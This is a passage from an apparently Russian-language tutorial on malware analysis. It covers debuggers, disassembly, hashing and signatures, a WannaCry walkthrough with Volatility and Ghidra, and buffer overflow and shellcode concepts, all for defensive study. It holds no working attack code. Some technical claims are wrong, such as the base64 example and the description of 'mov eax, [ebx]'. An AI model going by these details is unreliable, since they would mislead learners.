В DOS есть порядок исполнения файлов исходя их расширения файла. Порядок выполнения по имени файла: COM, EXE, а затем BAT. Например, если у вас есть три файла с именами HELLO.BAT, HELLO.EXE и HELLO.COM, и они расположены в одном каталоге, то при вводе HELLO в командной строке будет выполнен HELLO.COM. При выполнении программ в командной строке DOS всегда рекомендуется набирать полное имя файла, включая расширение.

Динамический анализ

Динамический анализ используется, когда нужно понять, как ведет себя вредоносная программа во время выполнения. Динамический анализ направлен на понимание действий вредоносного ПО в реальном времени. Специальный софт, дебаггер, позволяет понять, как исполняется программа. Он помогает выявить решения и пути, принимаемые кодом в режиме реального времени. Он показывает, как именно происходит исполнение тех или иных процессов в программе. Например, можно отследить изменения значений в ячейках памяти. Когда вы пишите программу, то с высокой вероятностью вам подсказывает об ошибках Source-Level Debugger, который смотрит на написанный вами код. Все эти простановки брейепоинтов на конкретных строках кода, это как раз работа Source-Level Debugger’а. Другой тип дебаггера это Assembly/Low-Level Debuggers, который оперирует на уровне ассемблера. Дизассемблинг — преобразование двоичного кода в человекочитаемый язык ассемблера, с которым и работает аналитик.

Динамический анализ отлично подходит для работы с обфусцированными или зашифрованными вредоносными программами благодаря своей способности анализировать поведение вредоносной программы во время выполнения. Когда вредоносная программа обфусцирована или зашифрована, ее код может показаться бессмысленным. Однако во время выполнения, вредоносная программа должна показать свою истинную функциональность, чтобы выполнить намеченные действия. Динамический анализ позволяет аналитикам наблюдать за этими действиями в режиме реального времени, обходя обфускацию или шифрование, которые могут скрыть истинную природу вредоносной программы от инструментов статического анализа.

Но есть нюанс. Динамический анализ недооценивает поведение программы, поскольку он анализирует программу только во время ее выполнения, фокусируясь на пути или путях, которые действительно были пройдены во время этого выполнения. Это означает, что любой код, который не выполняется в ходе наблюдаемого выполнения, остается не проанализированным. Сложные вредоносные программы могут использовать это ограничение, включая условные или триггерные модели поведения, которые остаются бездействующими или неактивными во время типичных сценариев анализа. В этом и состоит основной недостаток динамического анализа: вы не увидите инструкции, если они не исполняются. Если в программу заложено исполнение вредоносного кода через 5 лет после релиза, то вы никогда этого не узнаете, не проставив нужную дату в OS. Программы типа fuzzers пытаются генерировать контент для ввода в программу, чтобы протестировать как можно больше сценариев запуска кода. Примеры таких программ AFL, Microsoft’s Project Springfield, и Google’s OSS-Fuzz. Другой способ избежать обнаружения это «логические бомбы», которые срабатывают только при выполнении определенных условий. Поскольку эти условия могут не наступить во время динамического анализа, вредоносное поведение остается скрытым, что позволяет вредоносной программе избежать обнаружения. Также, Symbolic Execution весьма полезная техника.

Итак, избегают обнаружения с помощью использования тайм-бомб и логических бомб. Тайм-бомбы и логические бомбы — это триггерные модели поведения, которые могут обходить динамический анализ, оставаясь бездействующими или неактивными до тех пор, пока не будет выполнено определенное условие.

По инструментам. Неплохим выбором будет Winitor Pestudio и для статичного, и для динамического анализа. Вы сможете сгенерировать хеш файла для проверки на VirusTotal, и особенно хорош раздел indicators, где можно найти материалы типа ссылок из бинарника, и уровень энтропии. Чем выше уровень энтропии, тем более подозрительным считается индикатор.

Process Hacker — основной инструмент для динамического анализа, показывает все процессы в системе. Regshot это своего рода скриншот реестра. Обычно используется для сравнения, как выглядел реестр до и после исполнения вредоносного файла. x64 Debugger — позволит покопаться в файле, и запустить его с брейкпоинтами.

Process Monitor позволяет экспортировать CSV и сразу подгрузить в ProcDOT для получения визуализации процесса. На скриншоте ниже видно, что система заражена процессом brbbot.exe, запущенным в системе.

Попрактикуемся. Как и инструменты pe-tree и peframe, которые мы использовали ранее, PeStudio предоставляет очень полезную информацию о файле, включая хэш-значения, которые, как мы убедились, полезны для выявления вредоносного ПО. Одной из наиболее полезных функций PeStudio является область Indicators, которая автоматически выделяет потенциально вредоносные аспекты исполняемого файла Windows, который исследует утилита. Вы можете увидеть характеристики, которые PeStudio считает подозрительными для brbbot.exe, щелкнув область индикаторов инструмента.

Откроем вредоносный файл в x64dbg. Для назнчания брейкпоинта, впишите в командную строку SetBPX ReadFile и переключитесь на вкладку с брейкпоинтами чтобы убедитьбся, то чт овсе сработало.

Нажимаем на Debug > Run, и после некого времени мы окажемся на вкладке CPU с отработавшим брейпоинтом ровно на начале работы фунции ReadFile.

Настало время обратиться к документации MS. Где мы видим, что данное значения с первой строки относится к hFile.

Находим зашифрованные данные. Существует несколько методов шифрования/декодирования данных, некоторые из них сложнее других. Когда речь идет о вредоносном ПО, кодирование и декодирование должны быть простыми, чтобы при работе в памяти файл занимал как можно меньше места, поэтому авторы вредоносных программ обычно предпочитают использовать простые методы. Один из самых популярных методов, используемых для этой цели, — побитовое XOR, когда каждый бит в тексте, который вы хотите декодировать, XORируется с заранее известным значением (ключом). Для этого, в Remnux достаточно команды xxd -r -p encrypted.hex > encrypted.raw и translate.py encrypted.raw decrypted.txt ‘byte ^ 0x5b’.

Во время любого анализа происходит Decompilation — преобразование машинного кода обратно в C++ или в C. Разумеется, почти всегда с потерей имен переменных и прочего. Обфускация для усложнения реверс-инженеринга нам на руку не играет (злоумышленники любят Packers and Cryptors). Также, между высокоуровневым кодом и машинным кодом существует Intermediate representation (IR), что хорошо для кросс-платформенного анализа. Существует два ключевых алгоритма, disassembly with linear sweep и disassembly with recursive traversal. Эти два разных метода для анализа двоичного кода, каждый из которых имеет свой набор преимуществ и ограничений.

Disassembly с linear sweep — использует последовательный, систематический подход и не разбирает инструкции в случайном порядке. Если исполнение программы нелинейное, то вы упустите много деталей. Если в программу заложены лупы с динамическими условиями или любая другая сложная логика — не справится. Linear sweep стартует со специального момента в памяти и идет линейно, обрабатывая одну инструкцию за раз. Он простой в реализации, для начинашек. Такой алгоритм не справяется с кодом, который сильно оптимизирован и обфусцирован. Может выдать некорректные результаты. И иногда путает данные и код.

Disassembly с linear sweep (линейная развертка) это хороший выбор для анализа двоичного кода в сценариях, требующих быстрой первоначальной оценки, или при работе с относительно простыми структурами кода. Одним из таких сценариев может быть анализ вредоносного ПО на ранних стадиях, когда основной целью является получение базового понимания функциональности и поведения кода. Linear sweep (линейная развертка) обрабатывает код последовательно и с большей вероятностью неправильно интерпретирует обфускированный код. Причины, по которым в данном сценарии выбирается разборка с линейной разверткой:

• Простота реализации: дизассемблинг с линейной разверткой относительно прост в реализации, что делает его быстрым и доступным вариантом для начального анализа.
• Последовательный анализ: Он обеспечивает четкий, пошаговый анализ инструкций, помогая понять последовательность выполнения кода.
• Позволяет отслеживать основные структуры кода и определить ключевые пути выполнения.
• Минимальные накладные расходы: дизассемблинг с линейной разверткой обычно имеет низкие вычислительные затраты, что позволяет ускорить анализ.
• Эффективность использования ресурсов: В случаях, когда вычислительные ресурсы ограничены, линейная развертка может быть экономичным или даже единственным доступным выбором.

Хотя линейная разборка имеет свои ограничения, такие как трудности с обработкой сложных потоков управления и обфусцированного кода, ее простота и скорость делают ее ценной для предварительного анализа и быстрого понимания двоичного кода.

Рекурсивный обход работает, следуя логическому потоку кода, включая переходы и вызовы, что позволяет более точно разбирать код. Recursive Traversal включает в себя 4 стадии. 1) Первая это выбор starting point, своего рода входная дверь, и обычно это функция main. 2) Второй шаг это следование флоу кода, т.е. поиск ветвления и прочей логики. 3) Рекурсивный анализ. Может быть представлен визуально, что удобно. Подходит для работы со сложными структурами благодаря контекстному анализу и визуализации графов. Код, на который нет ссылок из известных точек входа, может быть не пройден и, следовательно, может быть пропущен, как говорилось выше.

Во время рекурсивного обхода ведется список адресов, что позволяет дизассемблеру отслеживать, где он побывал, и избегать повторного дизассемблирования кода, что очень эффективно.

Гибридный подход, сочетающий линейный и рекурсивный методы, позволяет использовать сильные стороны обоих методов для преодоления их индивидуальных недостатков. Итак, ключевые различия:

Disassembly with linear sweep:

• Последовательный и итерационный подход
• Простота реализации
• Ограниченная обработка сложных потоков управления
• Может неправильно интерпретировать данные как код

Disassembly with recursive traversal:

• Использует рекурсию и часто включает граф потока управления (CFG). Грани в CFG представляют собой возможные пути, по которым может двигаться выполнение программы от одного блока инструкций к другому.
• Работает со сложными структурами потока управления и обфусцированным кодом
• Более ресурсоемкий и сложный в реализации
• Обеспечивает полное понимание структуры программы

Преимущества:

Ограничения:

Linear sweep предпочтительна для начального анализа, быстрой оценки и случаев, когда простота имеет решающее значение, например, для анализа простых исполняемых файлов или выявления базовой функциональности кода. Recursive traversal предпочтительна для глубокого анализа сложного кода, критически важных приложений, анализа вредоносного ПО и сценариев, в которых важно понимание сложных потоков управления и обфускации.

Выбор между этими методами зависит от целей анализа, сложности кода, доступных ресурсов, а также от необходимости точности и глубины понимания двоичного кода.

Статический анализ

Статический анализ подразумевает анализ кода без его выполнения, т.е. просто читать код. По аналогии, разработчики проводят код-ревью коллег и находят неудачные решения в коде. Но в случае анализа вредоносного ПО у нас отсутствует доступ к исходному коду. На помощь придет бинарный реверс-инжиниринг + IDA FLIRT. Думаю понятно, что при ручном анализе огромной программы без исходного кода, можно потратить годы на поиск уязвимости.

Но ведь антивирусы как-то проверяют софт без запуска? У антивирусов есть сигнатуры, т.е. паттерны, ассоциированные с вирусами. Причем, речь не о точном совпадении, достаточно схожести или изменения размера стандартных файлов. Сигнатура может быть представлена строкой байт, например EICAR. Или криптографической хэш-функцией. Для анализа классификации вредоносных файлов также подойдет алгоритм Fuzzy hashing, или Graph-based hash для исполняемых файлов. Из инструментов, для статического анализа популярен Binwalk, Strings, Objdump.

В самом примитивном варианте, вирусы определяются не по имени файла, а по хеш-сумме. Хеш также позволяет понять, установил ли вирус в систему другие вирусы (и так нам достаточно проанализировать только один файл), или размножил сам себя. Я не случайно упомянул, что это самый простой вариант, т.к. даже минорное изменение в коде вируса полностью изменит хеш.

Если вы хотите сами создать хеш-сумму, то в Linux для этого используются утилиты md5sum, sha256sum, и sha1sum. В python есть hashlib. Для винды есть hash my file. Таких сервисов много, например sha256algorithm, который попросту использует echo -n "hello world" | sha256sum.

Статический анализ не особо справляется с обфусцированным кодом. Самый простой способ обфусцировать данные это base64, где бинарные данные преобразуются в ASCII-формат. Такой метод применяется даже в обычном http. Возьмем для примера слово «one». Первый шагом каждый символ преобразуется в битовое значение: «o» > 0x4f > 01001111, «n» > 0x6e > 01101110, «e» > 0x65 > 01100101. Второй шаг это биты 010011110110111001100101. Далее, результат разбивается на 4 группы, каждая по 6 битов: 010011 -> 19 -> base64 table lookup -> T. И получаем слово One = T25L.

При статическом анализе код изучается без выполнения, а значит, обфускация или шифрование остаются нетронутыми, что затрудняет выявление истинного назначения или функциональности вредоносного ПО. Динамический анализ, напротив, позволяет «увидеть», что на самом деле делает вредоносная программа, например, с какими системами она взаимодействует, к каким данным обращается или передает, как ведет себя в определенных условиях, что позволяет получить более четкое представление о ее намерениях и возможностях. Но, например, для анализа shellcode почти всегда используется статический анализ. JS любит использовать кодирование %u33aa%ubbff%uddee которое будет преобразовано в 33 ff bb ee dd, это можно увидеть и на статическом анализе.

У злоумышленников разные методы защиты своих программных «творений». Например, XOR, очень популярен в производстве malware, так как он очень прост. Особенно мульти-байтовый, он относительно устойчив к брутфорсу. Также используется junk insertion, как добавление ненужных байтов, branch functions как симуляция поведения кода, и overlapping instructions.

Assembler

В школе многие учили BASIC, но существуют и другие версии ассемблера. Такие как MASM, который является стандартом Intel для написания кода под x86. Например, процессор i386 содержит восемь 32-bit регистров, это x86. Хотя на одной и той же системе можно запускать как 32-, так и 64-битные приложения, когда процессор выполняет 32-битный код, он работает в 32-битном режиме, и вы не можете запускать 64-битный код. Поэтому, если вредоносному ПО необходимо запуститься в пространстве процесса 64-битного процесса, оно должно быть 64-битным.

Когда аналитик анализирует готовую программу на наличие вредоносного кода, он скорее всего будет работать с кодом ассемблера. Это безопасный анализ, где «разборка» вредоносного ПО позволяет аналитикам изучить его код, не выполняя его, что позволяет избежать потенциального вреда для системы или сети аналитика. Если аналитик умеет читать код, то он сможет понять функциональность софта без запуска. Нет необходимости читать двоичную форму подозрительного файла, когда есть ассемблерный код. Также, удается понять методы распространения вредоноса, доставки полезной нагрузки и техники уклонения.

Так как аналитик работает с дизассемблерным кодом, то надо его хоть как-то структурировать. Существуют техники compartmentalizing и выявление потока управления (CFG). Графы потока управления представляют собой визуальную карту логики выполнения кода, что облегчает его понимание.

Граф потока управления (CFG) — это бесценный инструмент в реверс-инжиниринге для визуализации и понимания логики сложной программы. Он помогает получить графическое представление всех возможных путей выполнения программы. Каждый узел (базовый блок) в CFG представляет собой последовательность инструкций от одного входа до одного выхода, а ребра указывают на переход от одного блока к другому. Такая визуализация позволяет реверс-инженеру увидеть условные операторы, циклы и ветвления в четком, организованном виде. Изучив CFG, можно выявить критические пути, мертвый код и потенциальные уязвимости. Кроме того, CFG помогает понять высокоуровневую структуру программы, что облегчает выдвижение гипотез о структуре и логике исходного кода программы. Такой взгляд с высоты птичьего полета на процесс выполнения программы очень важен при работе с большим и сложным программным обеспечением, когда чтение линейного дизассемблированного кода нецелесообразно и чревато ошибками.

Сигнатуры антивируса

Вот аналитик разобрал вирус на составляющие и понял нутрянку. Провел месяцы, занимаясь реверс-инжинирингом. Смог понять внутреннее устройство вредоносного ПО, его слабые места, возможно, обнаружить его происхождение или автора. Что дальше? Знания аналитика должны преобразоваться в сигнатуру для антивируса. Благодаря «разборке» выявляются уникальные шаблоны или сигнатуры вредоносного ПО, что помогает в разработке антивирусных сигнатур и эвристическом анализе. Сигнатуры антивируса представляют собой хеши, которые зачастую используют алгоритмы типа CRC or MD5. Также, популярен bite-streams, который примитивен до невозмодного: он попросту ищет строку, например X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*.

Сигнатуры также содержат проверку checksum по CRC, а это всего 4 байта, либо 32  для CRC32. Для строки выше, чек-сумма будет 0x6851CF3C. Оба алгоритма генерируют много ложно-позитивных результатов.

Каждый антивирус имеет свой алгоритм проверки чек-сум, и все изменения и улучшения в алгоритмах направлены на уменьшение ложно-позитивных срабатываний. Криптографический хеш же практически не страдает ложно-позитивными срабатываниями. Но т.к. криптографический хеш более дорог в вычислении, то применяется не всегда. Так, MD5 или SHA1 hash дороже CRC32. И напомню, что изменение даже одного байта в коде вируса ведет к полностью новой хешу. Достаточно добавить один байт в конце файла, и это может обмануть OS/антивирус.

Звучит опасно, поэтому читатель наверняка ожидает алгоритмы для более успешного детектирования вирусов. И они есть, один из них fuzzy hash, и у каждого антивируса своя собственная реализация алгоритма. Ложно-позитивные результаты все равно будут случаться, но не в такой степени, т.к. ищется паттерн, а не последовательность байт. А значит, для обмана такого алгоритма потребуется больше изменений в коде зловреда.

Предположим, вы скачиваете дистрибьютив Астра Линукс, как вы поймете, что дистрибьютив никак не был модифицирован злоумышленником? Почти всегда это проверка хэш-сумм. Хэш-функции обрабатывают содержимое файла и генерируют уникальный выходной код фиксированной длины. Такое хэширование необратимо, то есть по хэшу нельзя восстановить исходный файл. Хэш остается неизменным, если содержимое файла не меняется; в частности, изменение имени файла не влияет на хеш. Эти хэши играют важную роль в идентификации уникальных вредоносных программ, поиске по базам данных и служат индикаторами компрометации (IOC), а также используются при хранении паролей для аутентификации пользователей. Некоторые из часто используемых алгоритмов вычисления хэш-значений — MD5, SHA-1 и SHA-256. Попробуем ручками:

sudo apt install hashalot , и далее sha256sum filename.exe. Эта команда создаст хэш файла, который можно вставить в virustotal и проверить, светился ли такой хэш в мире зловредов. Пример: https://www.virustotal.com/gui/file/ac73e3c9e7ee62be2d2138fa5f8ef28679c0a191882b7a30e35ce7b89786935f

Чуть более продвинутый уровень это работа с PE Tree. Поизучаем уже имеющийся у нас файл WannaCry.exe. PE Tree выдаст информацию про файл, с секциями. Во-первых, он предоставляет информацию о файле, включая различные хэш-значения, с одним дополнительным хэш-значением, известным как imphash. Imphash, или import hash, — это особый тип хэша, используемый при анализе вредоносного ПО. Он создается путем хэширования списка импортируемых функций переносимого исполняемого файла Windows (PE), например .exe или .dll. Этот хэш помогает идентифицировать и сопоставлять различные образцы вредоносного ПО, которые могут иметь одну и ту же кодовую базу или функциональность, поскольку образцы вредоносного ПО с похожим поведением часто импортируют схожие наборы функций. Imphash — ценный инструмент для быстрой группировки и идентификации связанных образцов вредоносного ПО. Проверить «вредоносить» imphash можно по ссылке bazaar.abuse.ch.

Также, PE Tree покажет уровень энтропии (случайности) в файле.

Другой полезный инстурмент это peframe, устанавливаете его и запускаете команду peframe WannaCry.exe. В результате вы получите информацию о файле, список подозрительных действий и секций в файле, список используемых упаковщиков, если это упакованный файл, список функций c антиотладочными техниками, и многое другое.

Команда vol.py -f wcry.raw imageinfo покажет структуру KDBG (KDDEBUGGER_DATA64), которая будет использоваться плагинами pslist и modules. По выведенной информации можно предположить, что зараженная система работает на WindowsXP.

Переходим к pslist для получения списка процессов системы. Мы видим ID процесса, его имя, количество потоков, время запуска и завершения процесса, и является ли процесс Wow64 (когда используется 32-битное пространство на 64-битном ядре). Мы не увидим скрытые процессы, но их нам покажет psscan. В конкретно данном случае, PID 1940 инициировал PID 740, и оба процесса выглядят подозрительно. Следующим шагом, с помощью psscan можно посмотреть список всех процессов, включая завершенные, что поможет нам определить иерархию процессов и хронологию их создания.

Запустим psscan, и видим завершенные процессы taskdl.exe, taskse.exe вместе с родительским процессом PID 1940. С помощью ключа sort можно отсортировать результаты по дате, что лучше позволит понять хронологию.

Но это еще не все, мы продолжим командой dlllist. Она позволит увидеть загруженные DLL-процессы. Так мы сможем понять, какой файл инициировал заражение. Это может дать четкое представление о вредоносных процессах. В нашем случае, подозрительно выглядит tasksche.exe. Обычно на этом этапе нужно изучать библиотеки DLL, чтобы понять характеристики процесса, такие как шифрование, модификация реестра, создание сокетов и т. д.

Процесс @WanaDecryptor@ с PID 740 также использует тот же путь, что и процесс tasksche.exe. Судя по DLL, загружаемым процессом @WanaDecryptor@, он может выполнять создание сокетов (Ws2_32.dll), высокоуровневые сетевые взаимодействия (WININET.DLL), запросы к реестру (ADVAPI32.DLL), шифрование (SECURE32.DLL) и взаимодействие с браузерами (URLMON.DLL), такими как Internet Explorer и т.д.

Другие полезные команды это handles, printkey, connscan, ethscan, filescan, memdump.

Stack

В ассемблере x86 стек играет важную роль во время вызова функции. Когда функция вызывается с помощью инструкции CALL, адрес инструкции, следующей за CALL (адрес возврата), заталкивается в стек. Затем выполнение переходит к начальной точке функции. Внутри функции в стек могут помещаться параметры, и там же часто хранятся локальные переменные. Указатель стека (ESP) корректируется соответствующим образом на протяжении всего выполнения функции. Когда функция готова вернуться, используется инструкция RET. RET извлекает адрес возврата из стека и переходит по этому адресу, возобновляя выполнение после исходной инструкции CALL. Состояние стека при возврате функции должно соответствовать его состоянию при вызове функции, за исключением адреса возврата, который удаляется инструкцией RET.

Extended stack pointer (ESP) указывает на текущую позицию в верхней части стека. Перед ним идет the base pointer (EBP). Так, команда mov eax, [ebx] просто перекинет 4 байта из EBX в EAX. Это инструкция перемещения. mov eax 0 это eax в позицию ноль. А инструкция foo: .string "name" нужна для создания строки с именем name. $0x6 это константа. PUSH EBP; MOV EBP, ESP — это стандартная последовательность для установки нового кадра стека в начале функции. CALL это вызов функции, PUSH используется для помещения данных в стек, а не для вызова подпрограмм, как порой пишут в рунете.

Регистр EBP, или указатель, важен, поскольку он обеспечивает стабильную точку отсчета для доступа к параметрам функции и локальным переменным, независимо от того, где может находиться указатель стека (ESP) в любой момент выполнения функции. Также, доступ к старому базовому указателю осуществляется с помощью регистра текущего базового указателя (EBP) для ссылки на ячейку памяти, расположенную непосредственно над местом, на которое указывает EBP в стеке.

Любой процесс в архитектуре x86 может жить в размере от 0 до 4 GB, это виртуальная память, которую процесс рассматривает как полностью свою. Этот же диапазон может быть представлен от 0x0000000 до 0xFFFFFFFF. Kernel это основа, далее Stack, Heap для динамической работы с памятью в реальном времени, далее data и text, которые не меняют размер в рантайме.

Buffer Overflow

Buffer это участок памяти с данными. Если данных слишком много, то получаем buffer overflow. Переполнение буфера в стеке может перезаписать соседнюю память, которая может содержать критическую управляющую информацию, такую как адреса возврата, что может привести к нестабильному поведению программы или ее эксплуатации. Пользователь может и сам ввести слишком много данных в текстовое поле, и плохо написанная программа создаст buffer overflow. Даже сетевые пакеты могут вызвать buffer overflow.

Как работает Overflow. Предположим, что у нас есть ячейка памяти a с двумя байтами данных, и следом за ней ячейка памяти b с двумя байтами данных. Эти две ячейки памяти расположены в стеке рядом друг с другом. Если в ячейку a будет помещено более двух байт данных, то данные фактически переполнятся и будут записаны в ячейку b, чего программист не ожидал. Эксплойты переполнения буфера используют этот процесс в своих целях.

Для борьбы с такой уязвимостью существуют terminator canaries, random canaries и random XOR canaries. Эти техники помогают заранее выявить переполнение буфера и не выполнять потенциально опасный код.

Стековые канарейки — это механизмы безопасности, которые защищают от атак переполнения буфера, обнаруживая изменения известного значения, расположенного перед чувствительной управляющей информацией в стеке. При создании шелл-кода для эксплойта злоумышленник обычно стремится перезаписать часть стека, включая адрес возврата. Использование стековых канареек предотвращает это, обнаруживая переполнение и потенциально завершая процесс или вызывая предупреждение, тем самым пресекая попытку эксплойта.

Random XOR canaries похожа на Random canaries тем, что в качестве меры безопасности используется случайное значение. Однако в Random XOR canaries значение canaries соединяется с некоторой управляющей информацией, такой как адрес возврата, чтобы злоумышленнику было еще сложнее предсказать значение и успешно выполнить переполнение буфера без обнаружения.

Другая техника, Address Space Layout Randomization (ASLR), впервые появилась в линуксе, потом в Vista, Apple же ее внедрила только с 2007 года. брутфори=синг даже 64-битной системы по прежнему возможен.

Так называемый shellcode может провоцировать Stack и Buffer Overflow. Так, kernel32.dll содержит довольно важные функции и живет в памяти, shellcode находит kernel32.dll в памяти, парсит в поисках нужной функции. У kernel32.dll есть некий адрес, который отрабатывает по цепочке TEB -> PEB. Shellcode используется в эксплойтах для выполнения произвольного кода на целевой системе. Обычно для открытия оболочки, которая может принимать команды. Это позволяет злоумышленнику контролировать систему. Другие варианты не являются основными целями shellcode.

Shellcode не должен содержать нулевые байты. Потому что такие функции, как strcpy, останавливают копирование на нулевых байтах. Многие функции стандартной библиотеки C, такие как strcpy, завершают свою обработку при встрече с нулевым байтом. Если shellcode содержит нулевые байты, он может быть преждевременно обрезан во время инъекции, что приведет к неудаче.

Важно, что shellcode должен быть в форме, которую процессор может выполнить напрямую, без дополнительной компиляции или интерпретации. Это означает, что он должен быть в машинном коде, который представляет собой набор собственных инструкций, которые может выполнить процессор. Для эксплуатации злоумышленник должен внедрить код, который процессор целевой системы может немедленно выполнить, чтобы взять управление на себя или запустить командную оболочку.

Анализируем вредоносный файл

Представьте себе сценарий, в котором вредоносное ПО подозревается в краже конфиденциальной пользовательской информации. Чтобы понять, как и когда происходит эта кража, аналитик может использовать брейкпоинты в отладчике. Это позволит сделать остановку на функциях, предположительно участвующих в утечке данных, так аналитик может приостановить выполнение вредоносной программы непосредственно перед выполнением этих функций.

Например, если в коде вредоносной программы есть функция, которая, судя по всему, отправляет данные на внешний сервер, можно установить break point (0xCC) на вызове этой функции. Аналитик сможет просмотреть состояние программы, включая содержимое переменных и памяти. Это может выявить точные данные, которые являются целью кражи, например, номера кредитных карт, пароли или персональные идентификаторы.

Кроме того, break points могут помочь понять, при каких условиях происходит кража данных, например, срабатывает ли она при определенных действиях пользователя или по истечении определенного промежутка времени. Эта информация очень важна, как для понимания поведения вредоносной программы, так и для разработки стратегий по снижению или предотвращению несанкционированного доступа к данным.

Реверс-инжиниринг может быть законно и этично использован в целях обеспечения совместимости. Например, компании-разработчику программного обеспечения может понадобиться обеспечить совместимость своего нового продукта со старыми системами. В этом случае реверс-инжиниринг может быть использован для понимания механизмов и интерфейсов старых систем. Эти знания помогают разработать программное обеспечение, которое может легко взаимодействовать с этими старыми системами, не нарушая прав интеллектуальной собственности. Еще одно этичное применение — исследования в области безопасности, когда с помощью реинжиниринга выявляются уязвимости в программном обеспечении для повышения уровня кибербезопасности.

В примере ниже я буду работать с REMnux. Это как Kali, но для реверс-инжиниринга. Также, будет использован Flare-vm. Это скрипт, который устанавливает все инструменты для анализа Malware на Windows.

Разберем на составные WannaCry: запускаем в терминале Ghidra и создаем новый Non-Shared Project.

Перетягиваем вредоносный файл в окно программы, получаем следующий попап:

Далее, в “Analysis Options”, не забудьте отметить чек-боксы “WindowsPE x86 Propagate External Parameters” и “Variadic Function Signature Override (Prototype)”, и только после этого нажимайте кнопку Analyze. После анализа, в левой стороне интерфейса будет раздел Tree с вложенным списком Export. В нем будут представлены экспортируемые функции, а в разделе Import можно найти функции API, т.е. зависимости. В этом анализируемом файле мы наблюдаем ряд API, связанных с доступом к реестру, например RegCreateKeyW и RegSetValueExA. Вредоносное ПО часто использует реестр для хранения постоянных и конфигурационных данных. За деталями всегда можно обратиться к документации Microsoft.

Теперь ознакомимся с Symbol Reference. Открыв окно, сразу отфильтруем по reg. В отфильтрованном списке появился RegCreateKeyW. Выберем его, и вы увидите, что в окне «Symbol References» будет две ссылки (Call и Data). При двойном клике по адресу 00401d00, перепрыгните в CodeBrowser, где вам подсветится CALL на RegCreateKeyW, что, по сути, является вызовом функции.

Если нажать правой кнопкой мыши на 80000001h и выбрать Set Equate from the list, то появится окошко. Так как мы знаем, что RegCreateKeyW работает с реестром, то выберем HKEY_CURRENT_USER, это позволит создать референс вместо константы. Это действие изменит строку на более читабельную.

И так далее… что же будет искать исследователь в таком коде? Конкретно в случае WannaCry, была замечена попытка коннекта к довольно длинному домену. Как оказалось, что если программе удается установить связь с доменом, то она прекращает свое действие. Программа думала, что она в песочнице и переставала распространяться и шифровать файлы. Это помогло замедлить растространение, но появились другие версии с другими механизмами отключения.

Другой полезный инструмент это strings. Команда strings WannaCry.exe позволит извлечь текст из файла и вывести его на экран. Strings дает строки, которые удалось найти в файле. Полученные данные далеко не самый лучший способ изучения бинарного файла, но дает представление о некоторых его функциональных возможностях. Команда поинтереснее strings WannaCry.exe | grep Crypt.

Fuzzing

Это один из способов тестирования. По факту, банальная генерация бесконечного количества вариантов ввода данных в программу на огромной скорости. Это могут быть странные, невалидные данные для выявления багов, уявзвимостей. Если мы просто скачали программу из интернета и пытается ее тестировать, то это формат black box — когда мы ничего не знаем про внутренности программы, у нас есть только интерфейс. White box fuzzing — нам дали полный доступ к изначальному коду. И Gray box fuzzing — у нас есть некие знания про внутренности программы, но не полные.

Данные могут быть разными. Если мы берем существующие данные и изменяем алгоритмически, то это муация. Либо генерация данных с нуля, на основе некоторых правил. Поверх нужна автоматизация в виде наблюдения за поведением, отслеживания креша приложения, неожиданного поведения.

Разумеется, существует софт, такой как AFL (american fuzzy loop) — известен своим алгоритмом, помогает найти утечки в памяти и находить уязвимости. LibFuzzer — включается в процесс разработки, PeachFuzzer, BOOFUZZ хорошо для сетевых протоколов,

В безопасности компьютерных систем есть три ключевых элемента:

• эталонный монитор отвечает за предоставление доступам субъектов к объектам, он абстрактный и существует на уровне концепции.
• ядро безопасности: физические и электронные элементы, которые на техническом уровне обеспечивают работу эталонного монитора.
• TCB: содержит в себе множество компонентов, включая ядро безопасности.

В русской литературе эталонный монитор можно встретить под именами ядро безопасности или механизм контроля доступа (охранник). TCB (Trusted Computing Base) и эталонный монитор (Reference Monitor) это фундамент ИБ для физического компьютера. Они про управление всеми запросами на использование ресурсов железа. TCB контролирует доступ к ресурсам компьютера. Речь о компонентах железа и операционной системы, в том числе reference monitor, файловой системы, аутентификации в ОС. Супер-пользователь имеет доступ к перечисленным ресурсам, поэтому нужно минимизировать кол-во софта, которое требует прав уровня супер-пользователя. Так как эталонный монитор это абстрактная концепция, то он может быть и хардварным, и встроенным в OS или в ядро OS, и в пользовательское приложение, например, движок SQL. Принцип loosely-coupled, highly-cohesive гласит, что в модели эталонного монитора, тесно связанные друг с другом элементы системы, должны редко взаимодействовать и зависеть от других модулей.

Любой процесс всегда ассоциирован с пользователем. Процесс это концепция, используемая для инкапсуляции всей информации, необходимой для выполнения программы. Когда субъект (пользователи, группы, роли или криптографические ключи) запрашивает доступ к ресурсам компьютера, то происходит проверка, можно ли дать доступ к объекту. Это так называемым системный вызов — способ, с помощью которого компьютерная программа запрашивает определенный сервис у ядра ОС. Субъект монитора это активные сущности, такие как процессы или потоки, которые получают доступ к ресурсам. Главный принцип такого монитора это сущности, представляющие пользователей. Эталонный монитор является частью интерфейса между пользовательским пространством и ОС. Так это устроено во всех современных ОС, включая Windows, Linux и т.д. Многим известно такое понятие как «песочница»: программа (JAVA) выполняется в контролируемой эталонным монитором среде.

В железках существует разный уровень привилегий, так, Intel x86 поддерживает 4 таких уровня. Мы их называем кольцами и начинаем отсчет с нуля. Где 0 — уровень системы и 3 — уровень пользователя приложениями. Unix использует только кольца 0 и 3, т.е. на практике реализовано только два уровня.

Но для чего предназначено каждое кольцо? Давайте рассмотрим это на практических примерах:

• Кольцо 0 является основным для ОС. Это уровень привилегий с самыми высокими привилегиями, это необходимо для управления памятью.
• Кольцо 1 относится к вводу/выводу (input/output), компонентам ОС, таким как драйверы оборудования (программы, которые взаимодействуют с ОС, чтобы работали ваши мышки, клавиатуры, сетевая карта).
• Кольцо 2 относится к структурам и сервисам ОС более высокого уровня, таким как сетевой стек или файловая система.
• Кольцо 3 является ядром для приложений пользовательского уровня, таких как веб-браузер, программы для редактирования изображений, электронные таблицы — программное обеспечение, которое не относится к работе ОС. Кольцо 3 — это программы, которым доверяют меньше всего, поэтому они работают с самыми низкими уровнями привилегий.

Раз уж мы затронули память на кольце 0, то поговорим про нее более детально. Память RAM умеет и на чтение, и на запись. Очевидно, она не про целостность и конфиденциальность данных. ROM это память только на чтение, что делает такой тип памяти вполне допустимым для хранения OS. EPROM — из такой памяти можно удалить данные, поэтому подходит для хранения криптографических ключей. WROM — одноразовая запись, как на CD-R дисках.

Два термина, которые мы должны знать перед погружением в работу с памятью: пейджинг и сегментация.
